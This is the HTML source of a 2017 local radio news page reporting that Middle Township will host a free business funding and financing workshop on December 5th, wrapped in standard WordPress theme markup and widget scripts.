			<div class="featured">
						
				<a href="http://987thecoast.com/wp-content/uploads/2014/04/middle-township-logo.jpg" title="MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP" itemprop="image">
				
								
										
						<img width="472" height="336" src="http://987thecoast.com/wp-content/uploads/2014/04/middle-township-logo-472x336.jpg" class="attachment-main-slider size-main-slider wp-post-image" alt="" title="MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP" />					
										
								
				</a>
								
								
					</div>
	
		<h1 class="post-title" itemprop="name">
		MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP		</h1>
		
		<a href="http://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/#respond" class="comments"><i class="fa fa-comments-o"></i> 0</a>
		
	</header><!-- .post-header -->
	
	<div class="post-meta">
		<span class="posted-by">By 
			<span class="reviewer" itemprop="author"><a href="http://987thecoast.com/author/admin/" title="Posts by 98.7 The Coast WCZT" rel="author">98.7 The Coast WCZT</a></span>
		</span>
		 
		<span class="posted-on">on			<span class="dtreviewed">
				<time class="value-datetime" datetime="2017-11-17T19:35:20+00:00" itemprop="datePublished">November 17, 2017</time>
			</span>
		</span>
		
		<span class="cats"><a href="http://987thecoast.com/category/local-news/" rel="category tag">Local News</a>, <a href="http://987thecoast.com/category/local-news/middle-township/" rel="category tag">Middle Township</a></span>
			
	</div>
	
		

	<div class="post-container cf">
	
		<div class="post-content-right">
			<div class="post-content description" itemprop="articleBody">
			
				<p>Middle Township will host a free business resource funding and financing workshop on Tuesday, December 5th.  Township officials say the workshop will be held at the municipal building and will include state and federal officials who specialize in small business development.</p>
<div class="crafty-social-buttons crafty-social-share-buttons crafty-social-buttons-size-4 crafty-social-buttons-align-left crafty-social-buttons-caption-inline-block"><span class="crafty-social-caption">Share this:</span><ul class="crafty-social-buttons-list"><li><a href="https://www.facebook.com/sharer/sharer.php?u=http://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/" class="crafty-social-button csb-facebook hover-none" title="Share via Facebook" target="_blank"><img  class="crafty-social-button-image" alt="Share via Facebook" width="48" height="48" src="http://987thecoast.com/wp-content/plugins/crafty-social-buttons/buttons/simple/facebook.png" /></a></li><li><a href="https://plus.google.com/share?url=http://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/" class="crafty-social-button csb-google hover-none" title="Share via Google" target="_blank"><img  class="crafty-social-button-image" alt="Share via Google" width="48" height="48" src="http://987thecoast.com/wp-content/plugins/crafty-social-buttons/buttons/simple/google.png" /></a></li><li><a href="http://twitter.com/share?url=http://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/&#038;text=MIDDLE+TOWNSHIP+TO+HOLD+BUSINESS+RESOURCE+WORKSHOP" class="crafty-social-button csb-twitter hover-none" title="Share via Twitter" target="_blank"><img  class="crafty-social-button-image" alt="Share via Twitter" width="48" height="48" src="http://987thecoast.com/wp-content/plugins/crafty-social-buttons/buttons/simple/twitter.png" /></a></li></ul></div>			
										
							</div><!-- .post-content -->
		</div>
		
	</div>
	
	
			
</article>





<section class="related-posts">
	<h3 class="section-head">Related Posts</h3> 
	<ul class="highlights-box three-col related-posts">
	
		
		<li class="highlights column one-third">
			
			<article>
					
				<a href="http://987thecoast.com/local-news/avalon-set-kick-off-holiday-weekend-thanksgiving-week/" title="AVALON SET TO KICK OFF HOLIDAY WEEKEND THANKSGIVING WEEK" class="image-link">
					<img width="200" height="140" src="http://987thecoast.com/wp-content/uploads/2017/11/Festive-Friday-logo-2017_for-website-200x140.jpg" class="image wp-post-image" alt="" title="AVALON SET TO KICK OFF HOLIDAY WEEKEND THANKSGIVING WEEK" />
									</a>
				
				<div class="meta">
					<time datetime="2017-11-17T19:39:57-05:00">November 17, 2017 </time>
					
															
					<span class="comments"><i class="fa fa-comments-o"></i>
						0</span>	
					
				</div>
				
				<h2><a href="http://987thecoast.com/local-news/avalon-set-kick-off-holiday-weekend-thanksgiving-week/" title="AVALON SET TO KICK OFF HOLIDAY WEEKEND THANKSGIVING WEEK">AVALON SET TO KICK OFF HOLIDAY WEEKEND THANKSGIVING WEEK</a></h2>
				
			</article>
		</li>
		
		
		<li class="highlights column one-third">
			
			<article>
					
				<a href="http://987thecoast.com/local-news/freeholders-seeking-candidates-accc-board-trustees/" title="FREEHOLDERS SEEKING CANDIDATES FOR ACCC BOARD OF TRUSTEES" class="image-link">
					<img width="214" height="140" src="http://987thecoast.com/wp-content/uploads/2015/07/wczt-accc-214x140.jpg" class="image wp-post-image" alt="" title="FREEHOLDERS SEEKING CANDIDATES FOR ACCC BOARD OF TRUSTEES" />
									</a>
				
				<div class="meta">
					<time datetime="2017-11-17T19:37:30-05:00">November 17, 2017 </time>
					
															
					<span class="comments"><i class="fa fa-comments-o"></i>
						0</span>	
					
				</div>
				
				<h2><a href="http://987thecoast.com/local-news/freeholders-seeking-candidates-accc-board-trustees/" title="FREEHOLDERS SEEKING CANDIDATES FOR ACCC BOARD OF TRUSTEES">FREEHOLDERS SEEKING CANDIDATES FOR ACCC BOARD OF TRUSTEES</a></h2>
				
			</article>
		</li>
		
		
		<li class="highlights column one-third">
			
			<article>
					
				<a href="http://987thecoast.com/local-news/campbell-gets-six-months-home-detention-stealing-pba/" title="CAMPBELL GETS SIX MONTHS HOME DETENTION FOR STEALING FROM PBA" class="image-link">
					<img width="214" height="140" src="http://987thecoast.com/wp-content/uploads/2017/08/John-Campbell-214x140.jpg" class="image wp-post-image" alt="" title="CAMPBELL GETS SIX MONTHS HOME DETENTION FOR STEALING FROM PBA" />
									</a>
				
				<div class="meta">
					<time datetime="2017-11-17T19:33:26-05:00">November 17, 2017 </time>
					
															
					<span class="comments"><i class="fa fa-comments-o"></i>
						0</span>	
					
				</div>
				
				<h2><a href="http://987thecoast.com/local-news/campbell-gets-six-months-home-detention-stealing-pba/" title="CAMPBELL GETS SIX MONTHS HOME DETENTION FOR STEALING FROM PBA">CAMPBELL GETS SIX MONTHS HOME DETENTION FOR STEALING FROM PBA</a></h2>
				
			</article>
		</li>
		
		</ul>
</section>


				<div class="comments">
				
	
	<div id="comments">

		
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title"><span class="section-head">Leave A Reply</span> <small><a rel="nofollow" id="cancel-comment-reply-link" href="/local-news/middle-township-hold-business-resource-workshop/#respond" style="display:none;">Cancel Reply</a></small></h3>			<form action="http://987thecoast.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
				
			<p>
				<textarea name="comment" id="comment" cols="45" rows="8" aria-required="true" placeholder="Your Comment"></textarea>
			</p>
				<p>
					<input name="author" id="author" type="text" value="" size="30" aria-required="true" placeholder="Your Name" />
				</p>

				<p>
					<input name="email" id="email" type="text" value="" size="30" aria-required="true" placeholder="Your Email" />
				</p>
			

				<p>
					<input name="url" id="url" type="text" value="" size="30" placeholder="Your Website" />
				</p>
			
<p class="form-submit"><input name="submit" type="submit" id="comment-submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='87059' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="5e4ad2c67c" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="191"/></p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments -->
				</div>
	
			
		</div>
		
		
			
		
		<aside class="col-4 sidebar">
			<ul>
			
			<li id="custom_html-2" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><a href="http://streamdb3web.securenetsystems.net/v5/WCZT"> <img src="http://987thecoast.com/wp-content/uploads/2017/11/987listenlive.jpg"> </a>
<iframe src="http://wczt.tunegenie.com/plugins/onair/?searchbar=on&amp;streamfooter=on" name="onair" width="100%" height="480" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" align="top,left"></iframe></div></li>
<li id="custom_html-5" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><a href="https://www.coastsportstoday.com/"><img src="http://987thecoast.com/wp-content/uploads/2017/09/coastsportsslider.jpg" width="100%"></a>
</div></li>
<li id="custom_html-6" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><!-- BEGIN: Constant Contact Email List Form Button --><div align="center"><a href="https://visitor.r20.constantcontact.com/d.jsp?llr=44hgsp8ab&amp;p=oi&amp;m=1129025052671&amp;sit=o5wmsk8lb&amp;f=18026856-9a4a-45e0-a0ec-196472182130" class="button" style="background-color: rgb(177, 255, 255); border: 1px solid rgb(91, 91, 91); color: rgb(91, 91, 91); display: inline-block; padding: 8px 10px; text-shadow: none;">Join Our Email List</a><!-- BEGIN: Email Marketing you can trust --><div id="ctct_button_footer" align="center" style="font-family:Arial,Helvetica,sans-serif;font-size:10px;color:#999999;margin-top: 10px;">For Email Marketing you can trust.</div></div>
            </div></li>
<li id="feederninja_widget-2" class="widget FeederNinja_Widget">
        <div class="feederninja_widget"><iframe style="width:100%;height:500px;border:none;margin:0;padding:0;" src="https://www.feederninja.com/wordpress/feed/d6bd551257444a6a842c5964d07328a7?fnurl=https://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/" frameborder="0"></iframe></div></li>
<li id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- SideBar1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-3962822241210164"
     data-ad-slot="4390173670"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></li>
	
			</ul>
		</aside>
		
			
	</div> <!-- .row -->
</div> <!-- .main -->

		
	<footer class="main-footer">
	
		
	
			<div class="lower-foot">
			<div class="wrap">
		
						
			<div class="widgets">
							<div class="textwidget"><div class="custom-lower-footer-cont">
<div class="custom-lower-footer">
<ul>
<li><a href="http://coastalbroadcasting.com/wp-content/uploads/2017/05/CBSIEEOREPORTS.pdf">Public Info | </a></li>
<li class="ccopy-footer"> © Copyright 2017 <a href="/">987thecoast.com</a>. All rights reserved.</li>
</ul>
</div>
</div></div>
					</div>
			
					
			</div>
		</div>		
		<button style="padding-bottom:10px; width:100%; margin: 0 auto; float:none; text-align:center; background:#000000; color:#cccccc; font-size:12px;" onclick="myFunction()">Information</button>

<script>
function myFunction() {
    alert("Hello World");
}
</script>
	</footer>
	
</div> <!-- .main-wrap -->

<link rel='stylesheet' id='fm-jquery-ui-css'  href='http://987thecoast.com/wp-content/plugins/form-maker/css/jquery-ui-1.10.3.custom.css?ver=1.12.2' type='text/css' media='all' />
<link rel='stylesheet' id='fm-frontend-css'  href='http://987thecoast.com/wp-content/plugins/form-maker/css/form_maker_frontend.css?ver=1.12.2' type='text/css' media='all' />
<link rel='stylesheet' id='fm-googlefonts-css'  href='https://fonts.googleapis.com/css?family=Open+Sans|Oswald|Droid+Sans|Lato|Open+Sans+Condensed|PT+Sans|Ubuntu|PT+Sans+Narrow|Yanone+Kaffeesatz|Roboto+Condensed|Source+Sans+Pro|Nunito|Francois+One|Roboto|Raleway|Arimo|Cuprum|Play|Dosis|Abel|Droid+Serif|Arvo|Lora|Rokkitt|PT+Serif|Bitter|Merriweather|Vollkorn|Cantata+One|Kreon|Josefin+Slab|Playfair+Display|Bree+Serif|Crimson+Text|Old+Standard+TT|Sanchez|Crete+Round|Cardo|Noticia+Text|Judson|Lobster|Unkempt|Changa+One|Special+Elite|Chewy|Comfortaa|Boogaloo|Fredoka+One|Luckiest+Guy|Cherry+Cream+Soda|Lobster+Two|Righteous|Squada+One|Black+Ops+One|Happy+Monkey|Passion+One|Nova+Square|Metamorphous|Poiret+One|Bevan|Shadows+Into+Light|The+Girl+Next+Door|Coming+Soon|Dancing+Script|Pacifico|Crafty+Girls|Calligraffitti|Rock+Salt|Amatic+SC|Leckerli+One|Tangerine|Reenie+Beanie|Satisfy|Gloria+Hallelujah|Permanent+Marker|Covered+By+Your+Grace|Walter+Turncoat|Patrick+Hand|Schoolbell|Indie+Flower&#038;subset=greek,latin,greek-ext,vietnamese,cyrillic-ext,latin-ext,cyrillic' type='text/css' media='all' />
<link rel='stylesheet' id='fm-animate-css'  href='http://987thecoast.com/wp-content/plugins/form-maker/css/fm-animate.css?ver=1.12.2' type='text/css' media='all' />
<link rel='stylesheet' id='fm-font-awesome-css'  href='http://987thecoast.com/wp-content/plugins/form-maker/css/font-awesome/font-awesome.css?ver=1.12.2' type='text/css' media='all' />
<script type='text/javascript' src='http://987thecoast.com/wp-includes/js/comment-reply.min.js?ver=4.9'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/987thecoast.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.9'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var Bunyad = {"ajaxurl":"http:\/\/987thecoast.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/themes/smart-mag/js/bunyad-theme.js?ver=4.9'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/themes/smart-mag/js/jquery.flexslider-min.js?ver=4.9'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-includes/js/wp-embed.min.js?ver=4.9'></script>
<script async="async" type='text/javascript' src='http://987thecoast.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.1'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.js?ver=1.6'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/plugins/easy-fancybox/js/jquery.easing.min.js?ver=1.4.0'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/plugins/easy-fancybox/js/jquery.mousewheel.min.js?ver=3.1.13'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-includes/js/jquery/ui/effect-shake.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var fm_objectL10n = {"plugin_url":"http:\/\/987thecoast.com\/wp-content\/plugins\/form-maker","form_maker_admin_ajax":"http:\/\/987thecoast.com\/wp-admin\/admin-ajax.php","fm_file_type_error":"Can not upload this type of file","fm_field_is_required":"Field is required.","fm_min_max_check_1":"The ","fm_min_max_check_2":" value must be between ","fm_spinner_check":"Value must be between ","fm_clear_data":"Are you sure you want to clear saved data?","fm_grading_text":"Your score should be less than"};
/* ]]> */
</script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/plugins/form-maker/js/main_div_front_end.js?ver=1.12.2'></script>
<script type="text/javascript">
jQuery(document).on('ready post-load', function(){ jQuery('.nofancybox,a.pin-it-button,a[href*="pinterest.com/pin/create/button"]').addClass('nolightbox'); });
jQuery(document).on('ready post-load',easy_fancybox_handler);
jQuery(document).on('ready',easy_fancybox_auto);</script>


</body>
</html>